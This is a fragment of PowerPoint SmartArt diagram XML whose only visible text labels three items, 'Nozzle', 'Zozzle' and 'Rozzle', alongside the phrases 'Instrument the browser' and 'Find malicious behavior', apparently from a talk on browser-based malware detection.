          <a:endParaRPr lang="en-US" sz="48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 custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="54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     </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="4800" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>Zozzle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pPr algn="ctr"/>
          <a:r>
            <a:rPr lang="en-US" sz="4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  </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="4800" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>     </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="6600" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Rozzle</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="4000" dirty="0">
            <a:solidFill>
              <a:schemeClr val="tx1"/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 custFlipHor="1" custScaleX="74397" custScaleY="74397"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg2"/>
        </a:solidFill>
      </dgm:spPr>
    </dgm:pt>
    <dgm:pt modelId="{836B8372-1AC1-4C30-9C91-27561FA2BC32}" type="pres">
      <dgm:prSet presAssocID="{BE3E69EE-DBEB-4A8A-8CDA-C96E2CF47CFE}" presName="Child1" presStyleLbl="revTx" presStyleIdx="0" presStyleCnt="3" custScaleX="177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 custScaleX="63139" custScaleY="63139"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg2"/>
        </a:solidFill>
      </dgm:spPr>
    </dgm:pt>
    <dgm:pt modelId="{74586B4C-DC6C-42F1-8E4D-88C4E6336CBF}" type="pres">
      <dgm:prSet presAssocID="{9CBA3949-A4A7-4783-AAC7-6B56479DFAD4}" presName="Child2" presStyleLbl="revTx" presStyleIdx="1" presStyleCnt="3" custScaleX="177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 custScaleX="128285" custScaleY="128285"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="accent1"/>
        </a:solidFill>
      </dgm:spPr>
    </dgm:pt>
    <dgm:pt modelId="{16E1C02D-E7D5-45FC-B787-772B2C997025}" type="pres">
      <dgm:prSet presAssocID="{F85D88E0-5569-483C-B80D-52DADDD67C86}" presName="Child3" presStyleLbl="revTx" presStyleIdx="2" presStyleCnt="3" custScaleX="236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699614-3665-4C74-B3E1-79249E6B8B0B}" type="presOf" srcId="{BE3E69EE-DBEB-4A8A-8CDA-C96E2CF47CFE}" destId="{836B8372-1AC1-4C30-9C91-27561FA2BC32}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{9E0A4A29-0CFC-4EA4-B90C-8BF82F694095}" type="presOf" srcId="{42CA8381-D83C-49DC-A535-FD3A5A280337}" destId="{D62B9EF4-2EBE-48AA-93BD-359698940624}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/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13CEDB2D-7798-4F0C-86B8-E4437ACA8664}" type="presOf" srcId="{9BF7A25B-01D9-44DE-AAAA-07B6F5059E80}" destId="{EBE48C75-D016-4F08-9F51-B3D240ACF8EC}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{6DEC17B0-FC4E-4BFB-9427-13C27781F1AD}" type="presOf" srcId="{F85D88E0-5569-483C-B80D-52DADDD67C86}" destId="{16E1C02D-E7D5-45FC-B787-772B2C997025}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{D9088028-28BE-458F-9B6B-A2E437942B2D}" type="presOf" srcId="{9CBA3949-A4A7-4783-AAC7-6B56479DFAD4}" destId="{74586B4C-DC6C-42F1-8E4D-88C4E6336CBF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8EF81678-C4CD-418D-8A3B-E92681765A08}" type="presParOf" srcId="{D62B9EF4-2EBE-48AA-93BD-359698940624}" destId="{EBE48C75-D016-4F08-9F51-B3D240ACF8EC}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{076D2C0E-14A1-4AB5-9F52-F5579C3C7479}" type="presParOf" srcId="{D62B9EF4-2EBE-48AA-93BD-359698940624}" destId="{170CD44F-31FA-458A-99A0-9DA364AC4E8D}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{FB238652-1085-4C6C-9E57-FC965286CFA6}" type="presParOf" srcId="{D62B9EF4-2EBE-48AA-93BD-359698940624}" destId="{F98C0AC3-421E-4976-8531-27C2CAAC5D6E}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{0FD0F047-4B5D-453C-8502-9E6D2B20159D}" type="presParOf" srcId="{D62B9EF4-2EBE-48AA-93BD-359698940624}" destId="{836B8372-1AC1-4C30-9C91-27561FA2BC32}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{2765B29C-C17A-4F6D-BBB7-0D6E8CA7A7FF}" type="presParOf" srcId="{D62B9EF4-2EBE-48AA-93BD-359698940624}" destId="{1A49931B-DD10-4453-9AAE-2E9B095ADB05}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{FD0C9543-C21F-47CA-90BB-3F60D7E273CF}" type="presParOf" srcId="{1A49931B-DD10-4453-9AAE-2E9B095ADB05}" destId="{ACA413BF-0915-4049-A5C9-7FD42C0186B3}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{9A6DD6F7-9C1C-4A4E-8BDE-46B6F9BC88BC}" type="presParOf" srcId="{D62B9EF4-2EBE-48AA-93BD-359698940624}" destId="{74586B4C-DC6C-42F1-8E4D-88C4E6336CBF}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{CE73FEFC-45B8-4D0C-88AD-DF94C4B0DF38}" type="presParOf" srcId="{D62B9EF4-2EBE-48AA-93BD-359698940624}" destId="{47474F5A-E13F-4EA9-873E-C68EC610C1F8}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{9E296545-7C8C-4493-8684-015A912B26EE}" type="presParOf" srcId="{47474F5A-E13F-4EA9-873E-C68EC610C1F8}" destId="{69074874-D740-4421-B6B9-9D999C367698}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{269D0F44-3E16-4DB8-BD50-1A93878E0625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4000" b="1" dirty="0" smtClean="0"/>
            <a:t>Nozzle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r>
            <a:rPr lang="en-US" sz="4000" b="1" dirty="0" smtClean="0"/>
            <a:t>Rozzle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 custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="4000" b="1" dirty="0" smtClean="0"/>
            <a:t>Zozzle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/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{836B8372-1AC1-4C30-9C91-27561FA2BC32}" type="pres">
      <dgm:prSet presAssocID="{BE3E69EE-DBEB-4A8A-8CDA-C96E2CF47CFE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/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{74586B4C-DC6C-42F1-8E4D-88C4E6336CBF}" type="pres">
      <dgm:prSet presAssocID="{9CBA3949-A4A7-4783-AAC7-6B56479DFAD4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/>
      <dgm:spPr/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5DDFA3-D457-4A86-BA7F-C4F014720BCC}" type="presOf" srcId="{9CBA3949-A4A7-4783-AAC7-6B56479DFAD4}" destId="{74586B4C-DC6C-42F1-8E4D-88C4E6336CBF}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{797F5CAC-1EBD-4410-A141-1A28C256DA33}" type="presOf" srcId="{42CA8381-D83C-49DC-A535-FD3A5A280337}" destId="{D62B9EF4-2EBE-48AA-93BD-359698940624}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{8D7896D3-A794-482F-ABDE-966CF55FF06D}" type="presOf" srcId="{9BF7A25B-01D9-44DE-AAAA-07B6F5059E80}" destId="{EBE48C75-D016-4F08-9F51-B3D240ACF8EC}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{ECF02778-A120-4C0F-A101-8C9DF0533AA6}" type="presOf" srcId="{F85D88E0-5569-483C-B80D-52DADDD67C86}" destId="{16E1C02D-E7D5-45FC-B787-772B2C997025}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList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3E653FF8-8112-44A7-8A98-49DB14E3F7F8}" type="presOf" srcId="{BE3E69EE-DBEB-4A8A-8CDA-C96E2CF47CFE}" destId="{836B8372-1AC1-4C30-9C91-27561FA2BC32}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList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9B708C44-7D2E-49F2-BC17-5014F7CE0104}" type="presParOf" srcId="{D62B9EF4-2EBE-48AA-93BD-359698940624}" destId="{EBE48C75-D016-4F08-9F51-B3D240ACF8EC}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{A4F2FB8F-EF2C-4703-AB0D-DA49AE4F9545}" type="presParOf" srcId="{D62B9EF4-2EBE-48AA-93BD-359698940624}" destId="{170CD44F-31FA-458A-99A0-9DA364AC4E8D}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{3A34A4A1-9D72-4765-95FD-61A082488DFD}" type="presParOf" srcId="{D62B9EF4-2EBE-48AA-93BD-359698940624}" destId="{F98C0AC3-421E-4976-8531-27C2CAAC5D6E}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{C408E3E5-8A98-43C7-9A03-83460928E64D}" type="presParOf" srcId="{D62B9EF4-2EBE-48AA-93BD-359698940624}" destId="{836B8372-1AC1-4C30-9C91-27561FA2BC32}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{B43D7E1F-B321-4350-954D-A38F0B5C4A94}" type="presParOf" srcId="{D62B9EF4-2EBE-48AA-93BD-359698940624}" destId="{1A49931B-DD10-4453-9AAE-2E9B095ADB05}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{5595C486-832D-4E78-BF02-F384E9E8D534}" type="presParOf" srcId="{1A49931B-DD10-4453-9AAE-2E9B095ADB05}" destId="{ACA413BF-0915-4049-A5C9-7FD42C0186B3}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{C728A4CF-0EDF-4F80-ADCB-B5CF7019303F}" type="presParOf" srcId="{D62B9EF4-2EBE-48AA-93BD-359698940624}" destId="{74586B4C-DC6C-42F1-8E4D-88C4E6336CBF}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{8EEADF0F-7F23-4A22-B32E-FF319D21FEAF}" type="presParOf" srcId="{D62B9EF4-2EBE-48AA-93BD-359698940624}" destId="{47474F5A-E13F-4EA9-873E-C68EC610C1F8}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{814F3BA7-EDA6-4945-8804-7AF87A6849D9}" type="presParOf" srcId="{47474F5A-E13F-4EA9-873E-C68EC610C1F8}" destId="{69074874-D740-4421-B6B9-9D999C367698}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{2160F83D-296D-455E-8090-98980BFAC1A2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4000" b="1" dirty="0" smtClean="0"/>
            <a:t>Nozzle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 custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="4000" b="1" dirty="0" smtClean="0"/>
            <a:t>Zozzle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r>
            <a:rPr lang="en-US" sz="4000" b="1" dirty="0" smtClean="0"/>
            <a:t>Rozzle</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="4000" dirty="0">
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:lumMod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/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{836B8372-1AC1-4C30-9C91-27561FA2BC32}" type="pres">
      <dgm:prSet presAssocID="{BE3E69EE-DBEB-4A8A-8CDA-C96E2CF47CFE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/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{74586B4C-DC6C-42F1-8E4D-88C4E6336CBF}" type="pres">
      <dgm:prSet presAssocID="{9CBA3949-A4A7-4783-AAC7-6B56479DFAD4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/>
      <dgm:spPr/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32593-7BBF-438D-8339-89B1AF4F9AE4}" type="presOf" srcId="{9CBA3949-A4A7-4783-AAC7-6B56479DFAD4}" destId="{74586B4C-DC6C-42F1-8E4D-88C4E6336CBF}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{6BB426FD-15FC-4DD3-BBA0-0E0FA34403AC}" type="presOf" srcId="{9BF7A25B-01D9-44DE-AAAA-07B6F5059E80}" destId="{EBE48C75-D016-4F08-9F51-B3D240ACF8EC}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/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C4C8E74B-7D3F-45A8-ACD8-E3C9357CB8D5}" type="presOf" srcId="{42CA8381-D83C-49DC-A535-FD3A5A280337}" destId="{D62B9EF4-2EBE-48AA-93BD-359698940624}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{F1F04402-CF76-4CDA-B440-9AD09F7A1533}" type="presOf" srcId="{F85D88E0-5569-483C-B80D-52DADDD67C86}" destId="{16E1C02D-E7D5-45FC-B787-772B2C997025}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{E9219761-C17F-447B-857F-F30EDCB142B0}" type="presOf" srcId="{BE3E69EE-DBEB-4A8A-8CDA-C96E2CF47CFE}" destId="{836B8372-1AC1-4C30-9C91-27561FA2BC32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4519FE48-4261-4C97-8235-1AB3D8BFA5E5}" type="presParOf" srcId="{D62B9EF4-2EBE-48AA-93BD-359698940624}" destId="{EBE48C75-D016-4F08-9F51-B3D240ACF8EC}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{21CCD3F9-B931-429C-8F39-282922B358B6}" type="presParOf" srcId="{D62B9EF4-2EBE-48AA-93BD-359698940624}" destId="{170CD44F-31FA-458A-99A0-9DA364AC4E8D}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{A8823778-A2E7-44D9-9447-37828601E8A5}" type="presParOf" srcId="{D62B9EF4-2EBE-48AA-93BD-359698940624}" destId="{F98C0AC3-421E-4976-8531-27C2CAAC5D6E}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{8EDDAD63-B630-49FF-9068-63FB6D94541E}" type="presParOf" srcId="{D62B9EF4-2EBE-48AA-93BD-359698940624}" destId="{836B8372-1AC1-4C30-9C91-27561FA2BC32}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{7E3A7B93-8177-4CB4-9474-8C5BF038CBF3}" type="presParOf" srcId="{D62B9EF4-2EBE-48AA-93BD-359698940624}" destId="{1A49931B-DD10-4453-9AAE-2E9B095ADB05}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{D125B45E-D330-438B-9A26-99BC4DCF48A7}" type="presParOf" srcId="{1A49931B-DD10-4453-9AAE-2E9B095ADB05}" destId="{ACA413BF-0915-4049-A5C9-7FD42C0186B3}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{8B6EF154-4206-431D-8E7F-BC2B7E0F4CA9}" type="presParOf" srcId="{D62B9EF4-2EBE-48AA-93BD-359698940624}" destId="{74586B4C-DC6C-42F1-8E4D-88C4E6336CBF}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{A9DC2875-C849-4964-A80B-B3DA1F72E0FC}" type="presParOf" srcId="{D62B9EF4-2EBE-48AA-93BD-359698940624}" destId="{47474F5A-E13F-4EA9-873E-C68EC610C1F8}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{376FD64F-46CA-4432-AB3F-9B104AE87ADC}" type="presParOf" srcId="{47474F5A-E13F-4EA9-873E-C68EC610C1F8}" destId="{69074874-D740-4421-B6B9-9D999C367698}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{3C7F1668-2090-411E-9CD1-75CAF29B72BD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CBA3949-A4A7-4783-AAC7-6B56479DFAD4}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="ctr"/>
          <a:r>
            <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
            <a:t>Instrument the browser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/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="ctr"/>
          <a:r>
            <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
            <a:t>Find malicious behavior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>
        <a:ln>
          <a:noFill/>
        </a:ln>
        <a:effectLst/>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="3600" dirty="0">
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:lumMod val="50000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:endParaRPr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90309C7-1899-4CD1-AA74-A540BAC8566E}" type="pres">
      <dgm:prSet presAssocID="{BE3E69EE-DBEB-4A8A-8CDA-C96E2CF47CFE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DE43A99-7C6C-4AFE-A15E-723DD53E1CBA}" type="pres">
      <dgm:prSet presAssocID="{9CBA3949-A4A7-4783-AAC7-6B56479DFAD4}" presName="Accent" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="2"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{9EE55393-DFAB-43CB-91DC-24B58349D17D}" type="pres">
      <dgm:prSet presAssocID="{9CBA3949-A4A7-4783-AAC7-6B56479DFAD4}" presName="Image1" presStyleLbl="fgImgPlace1" presStyleIdx="0" presStyleCnt="2"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1A5263A7-8AC9-41D6-9BBB-456B0B592F19}" type="pres">
      <dgm:prSet presAssocID="{9CBA3949-A4A7-4783-AAC7-6B56479DFAD4}" presName="Child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15DF6-830D-4AE9-93B0-B23C9B93DC10}" type="pres">
      <dgm:prSet presAssocID="{F85D88E0-5569-483C-B80D-52DADDD67C86}" presName="Image2" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{69074874-D740-4421-B6B9-9D999C367698}" type="pres">
      <dgm:prSet presAssocID="{F85D88E0-5569-483C-B80D-52DADDD67C86}" presName="Image" presStyleLbl="fgImgPlace1" presStyleIdx="1" presStyleCnt="2"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{8BB7EC6C-5DD7-4222-AC4E-791FD67CE7DD}" type="pres">
      <dgm:prSet presAssocID="{F85D88E0-5569-483C-B80D-52DADDD67C86}" presName="Child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CFA939-D783-41B7-9CDA-13EFBEFDE516}" type="presOf" srcId="{42CA8381-D83C-49DC-A535-FD3A5A280337}" destId="{D62B9EF4-2EBE-48AA-93BD-359698940624}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{66510539-223B-43A8-BBD7-5A7460B974BE}" srcId="{BE3E69EE-DBEB-4A8A-8CDA-C96E2CF47CFE}" destId="{F85D88E0-5569-483C-B80D-52DADDD67C86}" srcOrd="1" destOrd="0" parTransId="{17C3F4A5-BF4E-4D83-B70D-B4035F1B932E}" sibTransId="{9B4F3F4F-2344-4DC5-AD50-6D29D9598234}"/>
    <dgm:cxn modelId="{124BD990-114E-4666-A905-4B796FAB3577}" type="presOf" srcId="{BE3E69EE-DBEB-4A8A-8CDA-C96E2CF47CFE}" destId="{D90309C7-1899-4CD1-AA74-A540BAC8566E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{F1EF2B73-04AD-4526-8C31-9FA2B44424AD}" type="presOf" srcId="{F85D88E0-5569-483C-B80D-52DADDD67C86}" destId="{8BB7EC6C-5DD7-4222-AC4E-791FD67CE7DD}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{F93A3A5B-B321-444D-8466-050D6B3BC20D}" type="presOf" srcId="{9CBA3949-A4A7-4783-AAC7-6B56479DFAD4}" destId="{1A5263A7-8AC9-41D6-9BBB-456B0B592F19}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{EA4E4D66-506E-490A-BF91-791CBD332AC8}" srcId="{BE3E69EE-DBEB-4A8A-8CDA-C96E2CF47CFE}" destId="{9CBA3949-A4A7-4783-AAC7-6B56479DFAD4}" srcOrd="0" destOrd="0" parTransId="{0D7E027F-477F-47C6-ACB2-38976E637203}" sibTransId="{E7F67361-B7B8-4C78-959C-9D8810C47A70}"/>
    <dgm:cxn modelId="{B1FFD44C-3621-4ED4-8856-C4BB9AB5A253}" srcId="{42CA8381-D83C-49DC-A535-FD3A5A280337}" destId="{BE3E69EE-DBEB-4A8A-8CDA-C96E2CF47CFE}" srcOrd="0" destOrd="0" parTransId="{1AEA54FF-D9A7-4E97-9159-E0DF0DEDADB4}" sibTransId="{912AD743-EC93-45A9-9163-A14A9AA5C912}"/>
    <dgm:cxn modelId="{8FC60325-AE47-4A22-8151-44D46DB9E1B7}" type="presParOf" srcId="{D62B9EF4-2EBE-48AA-93BD-359698940624}" destId="{D90309C7-1899-4CD1-AA74-A540BAC8566E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{778FFFB9-ED90-4E4D-9688-F77F455E21DF}" type="presParOf" srcId="{D62B9EF4-2EBE-48AA-93BD-359698940624}" destId="{0DE43A99-7C6C-4AFE-A15E-723DD53E1CBA}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{5846C1A8-CA54-4850-8D37-FF50BCE3BBCE}" type="presParOf" srcId="{D62B9EF4-2EBE-48AA-93BD-359698940624}" destId="{9EE55393-DFAB-43CB-91DC-24B58349D17D}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{0538683F-1984-4366-B558-1D9841F1D70E}" type="presParOf" srcId="{D62B9EF4-2EBE-48AA-93BD-359698940624}" destId="{1A5263A7-8AC9-41D6-9BBB-456B0B592F19}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{E520AFC1-C8C3-42F0-967E-CCC93A361EC4}" type="presParOf" srcId="{D62B9EF4-2EBE-48AA-93BD-359698940624}" destId="{2EF15DF6-830D-4AE9-93B0-B23C9B93DC10}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{5B0C2736-7CBA-48F5-BFBC-9E0B033F460E}" type="presParOf" srcId="{2EF15DF6-830D-4AE9-93B0-B23C9B93DC10}" destId="{69074874-D740-4421-B6B9-9D999C367698}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{A842CE34-A494-46CF-8A0E-A3C28E824AEE}" type="presParOf" srcId="{D62B9EF4-2EBE-48AA-93BD-359698940624}" destId="{8BB7EC6C-5DD7-4222-AC4E-791FD67CE7DD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pPr algn="ctr"/>
          <a:r>
            <a:rPr lang="en-US" sz="4000" b="1" dirty="0" smtClean="0"/>
            <a:t>     </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="4800" b="1" dirty="0" smtClean="0"/>
            <a:t>Nozzle</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
            <a:t>   </a:t>
          </a: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50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>Zozzle</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US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50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>Rozzle</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US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 custAng="900134"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F98C0AC3-421E-4976-8531-27C2CAAC5D6E}" type="pres">
      <dgm:prSet presAssocID="{BE3E69EE-DBEB-4A8A-8CDA-C96E2CF47CFE}" presName="Image1" presStyleLbl="fgImgPlace1" presStyleIdx="0" presStyleCnt="3" custScaleX="137594" custScaleY="137594"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="tx2"/>
        </a:solidFill>
        <a:ln>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="50000"/>
            </a:schemeClr>
          </a:solidFill>
        </a:ln>
      </dgm:spPr>
    </dgm:pt>
    <dgm:pt modelId="{836B8372-1AC1-4C30-9C91-27561FA2BC32}" type="pres">
      <dgm:prSet presAssocID="{BE3E69EE-DBEB-4A8A-8CDA-C96E2CF47CFE}" presName="Child1" presStyleLbl="revTx" presStyleIdx="0" presStyleCnt="3" custScaleX="1539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 custScaleX="62261" custScaleY="62261"/>
      <dgm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74586B4C-DC6C-42F1-8E4D-88C4E6336CBF}" type="pres">
      <dgm:prSet presAssocID="{9CBA3949-A4A7-4783-AAC7-6B56479DFAD4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 custScaleX="62261" custScaleY="62261"/>
      <dgm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B8349C-84E3-4ACB-A422-59DDF8FFAC5A}" type="presOf" srcId="{9BF7A25B-01D9-44DE-AAAA-07B6F5059E80}" destId="{EBE48C75-D016-4F08-9F51-B3D240ACF8EC}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{498CDDD3-8A04-493E-91CD-3E85054F6AD8}" type="presOf" srcId="{42CA8381-D83C-49DC-A535-FD3A5A280337}" destId="{D62B9EF4-2EBE-48AA-93BD-359698940624}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{A58D6BD1-730F-428F-AE2B-C94425ECC668}" type="presOf" srcId="{9CBA3949-A4A7-4783-AAC7-6B56479DFAD4}" destId="{74586B4C-DC6C-42F1-8E4D-88C4E6336CBF}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{4D441743-4632-4CC9-AB97-B28149DDE210}" type="presOf" srcId="{BE3E69EE-DBEB-4A8A-8CDA-C96E2CF47CFE}" destId="{836B8372-1AC1-4C30-9C91-27561FA2BC32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3E3828D6-F8F7-4A6D-BB90-23F2FD9113EA}" type="presOf" srcId="{F85D88E0-5569-483C-B80D-52DADDD67C86}" destId="{16E1C02D-E7D5-45FC-B787-772B2C997025}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList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51124B65-BB5E-4D3D-8C91-8861AB25137D}" type="presParOf" srcId="{D62B9EF4-2EBE-48AA-93BD-359698940624}" destId="{EBE48C75-D016-4F08-9F51-B3D240ACF8EC}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
